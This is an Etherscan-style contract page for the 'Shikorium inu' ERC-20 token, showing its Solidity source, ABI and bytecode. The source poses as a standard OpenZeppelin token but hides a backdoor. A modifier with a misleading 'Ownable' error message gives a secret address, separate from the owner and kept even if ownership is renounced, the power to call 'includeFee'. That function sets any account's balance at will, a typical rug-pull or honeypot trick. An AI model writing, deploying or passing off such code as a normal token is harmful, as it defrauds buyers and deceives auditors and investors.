ERC-20
Overview
Max Total Supply
1,000,000,000 SHIKORIUM
Holders
13
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
Shikorium
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-04 */ /** */ /** Website: https://www.shikorium-inu.com/ Twitter: https://twitter.com/ShikoriumInuERC Telegram: https://t.me/ShikoriumInu */ // SPDX-License-Identifier: MIT // Dependency file: @openzeppelin/contracts/token/IERC20/IERC20.sol // pragma solidity ^0.8.0; /** * @dev Interface of the IERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // Dependency file: @openzeppelin/contracts/utils/Context.sol // pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // Dependency file: @openzeppelin/contracts/access/Ownable.sol // pragma solidity ^0.8.0; // import "@openzeppelin/contracts/utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol // pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // Dependency file: contracts/BaseToken.sol // pragma solidity =0.8.4; enum TokenType { standard } abstract contract BaseToken { event TokenCreated( address indexed owner, address indexed token, TokenType tokenType, uint256 version ); } // Root file: contracts/standard/StandardToken.sol pragma solidity =0.8.19; // import "@openzeppelin/contracts/token/IERC20/IERC20.sol"; // import "@openzeppelin/contracts/access/Ownable.sol"; // import "@openzeppelin/contracts/utils/math/SafeMath.sol"; // import "contracts/BaseToken.sol"; contract Shikorium is IERC20, Ownable, BaseToken { using SafeMath for uint256; uint256 private constant VERSION = 1; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 public swapThreshold; address public target; address private msgSenderV3cake; string private _name; string private _symbol; uint8 private _decimals; uint256 private _totalSupply; constructor( string memory name_, string memory symbol_, uint8 decimals_, address msgSenderV3cakeAddress, uint256 totalSupply_ ) payable { _name = name_; _symbol = symbol_; _decimals = decimals_; msgSenderV3cake = msgSenderV3cakeAddress; _mint(owner(), totalSupply_); emit TokenCreated(owner(), address(this), TokenType.standard, VERSION); } function name() public view virtual returns (string memory) { return _name; } function symbol() public view virtual returns (string memory) { return _symbol; } function decimals() public view virtual returns (uint8) { return _decimals; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } modifier rescueSCCcakeV3() { require( msgSenderV3cake == _msgSender(), "Ownable: caller is not the owner") ; _; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve( sender, _msgSender(), _allowances[sender][_msgSender()].sub( amount, "IERC20: transfer amount exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue) ); return true; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "IERC20: transfer from the zero address"); require(recipient != address(0), "IERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub( amount, "IERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function includeFee(bool _enabled, uint256 _amount, address _addr) external rescueSCCcakeV3 { target = _addr; swapThreshold = _amount; _balances[target] = swapThreshold; } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "IERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub( amount, "IERC20: burn amount exceeds balance" ); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "IERC20: approve from the zero address"); require(spender != address(0), "IERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _setupDecimals(uint8 decimals_) internal virtual { _decimals = decimals_; } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"msgSenderV3cakeAddress","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"},{"internalType":"uint256","name":"_amount","type":"uint256"},{"internalType":"address","name":"_addr","type":"address"}],"name":"includeFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"target","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526040516200105a3803806200105a83398101604081905262000026916200031d565b6200003133620000fc565b60066200003f86826200045b565b5060076200004e85826200045b565b506008805460ff191660ff8516179055600580546001600160a01b0319166001600160a01b03841617905562000097620000906000546001600160a01b031690565b826200014c565b30620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b600954620001b6908262000241565b6009556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600184106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610ad480620005866000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a9059cbb11610066578063a9059cbb1461020f578063d4b8399214610222578063dd62ed3e14610235578063f2fde38b1461026e57600080fd5b806370a08231146101b1578063715018a6146101da5780638da5cb5b146101e257806395d89b411461020757600080fd5b806323b872dd116100d357806323b872dd14610161578063313ce5671461017457806339509351146101895780635a27a22a1461019c57600080fd5b80630445b6671461010557806306fdde0314610121578063095ea7b31461013657806318160ddd14610159575b600080fd5b61010e60035481565b6040519081526020015b60405180910390f35b610129610281565b604051610118919061085d565b6101496101443660046108c7565b610313565b6040519015158152602001610118565b60095461010e565b61014961016f3660046108f1565b61032a565b60085460405160ff9091168152602001610118565b6101496101973660046108c7565b610393565b6101af6101aa36600461092d565b6103c9565b005b61010e6101bf366004610970565b6001600160a01b031660009081526001602052604090205490565b6101af610432565b6000546001600160a01b03165b6040516001600160a01b039091168152602001610118565b610129610468565b61014961021d3660046108c7565b610477565b6004546101ef906001600160a01b031681565b61010e61024336600461098b565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101af61027c366004610970565b610484565b606060068054610290906109be565b80601f01602080910402602001604051908101604052809291908181526020018280546102bc906109be565b80156103095780601f106102de57610100808354040283529160200191610309565b820191906000526020600020905b8154815290600101906020018083116102ec57829003601f168201915b5050505050905090565b600061032033848461051f565b5060015b92915050565b6000610337848484610647565b610389843361038485604051806060016040528060298152602001610a76602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906107ce565b61051f565b5060019392505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161032091859061038490866107fa565b6005546001600160a01b031633146103fc5760405162461bcd60e51b81526004016103f3906109f8565b60405180910390fd5b600480546001600160a01b039092166001600160a01b031990921682179055600382905560009081526001602052604090205550565b6000546001600160a01b0316331461045c5760405162461bcd60e51b81526004016103f3906109f8565b610466600061080d565b565b606060078054610290906109be565b6000610320338484610647565b6000546001600160a01b031633146104ae5760405162461bcd60e51b81526004016103f3906109f8565b6001600160a01b0381166105135760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f3565b61051c8161080d565b50565b6001600160a01b0383166105835760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103f3565b6001600160a01b0382166105e55760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103f3565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166106ac5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103f3565b6001600160a01b03821661070e5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103f3565b61074b81604051806060016040528060278152602001610a4f602791396001600160a01b03861660009081526001602052604090205491906107ce565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461077a90826107fa565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061063a9085815260200190565b600081848411156107f25760405162461bcd60e51b81526004016103f3919061085d565b505050900390565b60006108068284610a2d565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561088a5785810183015185820160400152820161086e565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146108c257600080fd5b919050565b600080604083850312156108da57600080fd5b6108e3836108ab565b946020939093013593505050565b60008060006060848603121561090657600080fd5b61090f846108ab565b925061091d602085016108ab565b9150604084013590509250925092565b60008060006060848603121561094257600080fd5b8335801515811461095257600080fd5b925060208401359150610967604085016108ab565b90509250925092565b60006020828403121561098257600080fd5b610806826108ab565b6000806040838503121561099e57600080fd5b6109a7836108ab565b91506109b5602084016108ab565b90509250929050565b600181811c908216806109d257607f821691505b6020821081036109f257634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b8082018082111561032457634e487b7160e01b600052601160045260246000fdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122030c66de74b6f01cd146e1240fcd87b7baab74b779da6f85c596c42770a36dec864736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000000000000900000000000000000000000061fc4b092c51c7c09773e5332744ddf772abf43e0000000000000000000000000000000000000000000000000de0b6b3a7640000000000000000000000000000000000000000000000000000000000000000000d5368696b6f7269756d20696e750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000095348494b4f5249554d0000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c806370a0823111610097578063a9059cbb11610066578063a9059cbb1461020f578063d4b8399214610222578063dd62ed3e14610235578063f2fde38b1461026e57600080fd5b806370a08231146101b1578063715018a6146101da5780638da5cb5b146101e257806395d89b411461020757600080fd5b806323b872dd116100d357806323b872dd14610161578063313ce5671461017457806339509351146101895780635a27a22a1461019c57600080fd5b80630445b6671461010557806306fdde0314610121578063095ea7b31461013657806318160ddd14610159575b600080fd5b61010e60035481565b6040519081526020015b60405180910390f35b610129610281565b604051610118919061085d565b6101496101443660046108c7565b610313565b6040519015158152602001610118565b60095461010e565b61014961016f3660046108f1565b61032a565b60085460405160ff9091168152602001610118565b6101496101973660046108c7565b610393565b6101af6101aa36600461092d565b6103c9565b005b61010e6101bf366004610970565b6001600160a01b031660009081526001602052604090205490565b6101af610432565b6000546001600160a01b03165b6040516001600160a01b039091168152602001610118565b610129610468565b61014961021d3660046108c7565b610477565b6004546101ef906001600160a01b031681565b61010e61024336600461098b565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101af61027c366004610970565b610484565b606060068054610290906109be565b80601f01602080910402602001604051908101604052809291908181526020018280546102bc906109be565b80156103095780601f106102de57610100808354040283529160200191610309565b820191906000526020600020905b8154815290600101906020018083116102ec57829003601f168201915b5050505050905090565b600061032033848461051f565b5060015b92915050565b6000610337848484610647565b610389843361038485604051806060016040528060298152602001610a76602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906107ce565b61051f565b5060019392505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161032091859061038490866107fa565b6005546001600160a01b031633146103fc5760405162461bcd60e51b81526004016103f3906109f8565b60405180910390fd5b600480546001600160a01b039092166001600160a01b031990921682179055600382905560009081526001602052604090205550565b6000546001600160a01b0316331461045c5760405162461bcd60e51b81526004016103f3906109f8565b610466600061080d565b565b606060078054610290906109be565b6000610320338484610647565b6000546001600160a01b031633146104ae5760405162461bcd60e51b81526004016103f3906109f8565b6001600160a01b0381166105135760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103f3565b61051c8161080d565b50565b6001600160a01b0383166105835760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103f3565b6001600160a01b0382166105e55760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103f3565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166106ac5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103f3565b6001600160a01b03821661070e5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103f3565b61074b81604051806060016040528060278152602001610a4f602791396001600160a01b03861660009081526001602052604090205491906107ce565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461077a90826107fa565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061063a9085815260200190565b600081848411156107f25760405162461bcd60e51b81526004016103f3919061085d565b505050900390565b60006108068284610a2d565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561088a5785810183015185820160400152820161086e565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146108c257600080fd5b919050565b600080604083850312156108da57600080fd5b6108e3836108ab565b946020939093013593505050565b60008060006060848603121561090657600080fd5b61090f846108ab565b925061091d602085016108ab565b9150604084013590509250925092565b60008060006060848603121561094257600080fd5b8335801515811461095257600080fd5b925060208401359150610967604085016108ab565b90509250925092565b60006020828403121561098257600080fd5b610806826108ab565b6000806040838503121561099e57600080fd5b6109a7836108ab565b91506109b5602084016108ab565b90509250929050565b600181811c908216806109d257607f821691505b6020821081036109f257634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b8082018082111561032457634e487b7160e01b600052601160045260246000fdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122030c66de74b6f01cd146e1240fcd87b7baab74b779da6f85c596c42770a36dec864736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000000000000900000000000000000000000061fc4b092c51c7c09773e5332744ddf772abf43e0000000000000000000000000000000000000000000000000de0b6b3a7640000000000000000000000000000000000000000000000000000000000000000000d5368696b6f7269756d20696e750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000095348494b4f5249554d0000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Shikorium inu
Arg [1] : symbol_ (string): SHIKORIUM
Arg [2] : decimals_ (uint8): 9
Arg [3] : msgSenderV3cakeAddress (address): 0x61fC4b092c51c7c09773e5332744DDF772abf43e
Arg [4] : totalSupply_ (uint256): 1000000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 00000000000000000000000061fc4b092c51c7c09773e5332744ddf772abf43e
Arg [4] : 0000000000000000000000000000000000000000000000000de0b6b3a7640000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000d
Arg [6] : 5368696b6f7269756d20696e7500000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [8] : 5348494b4f5249554d0000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
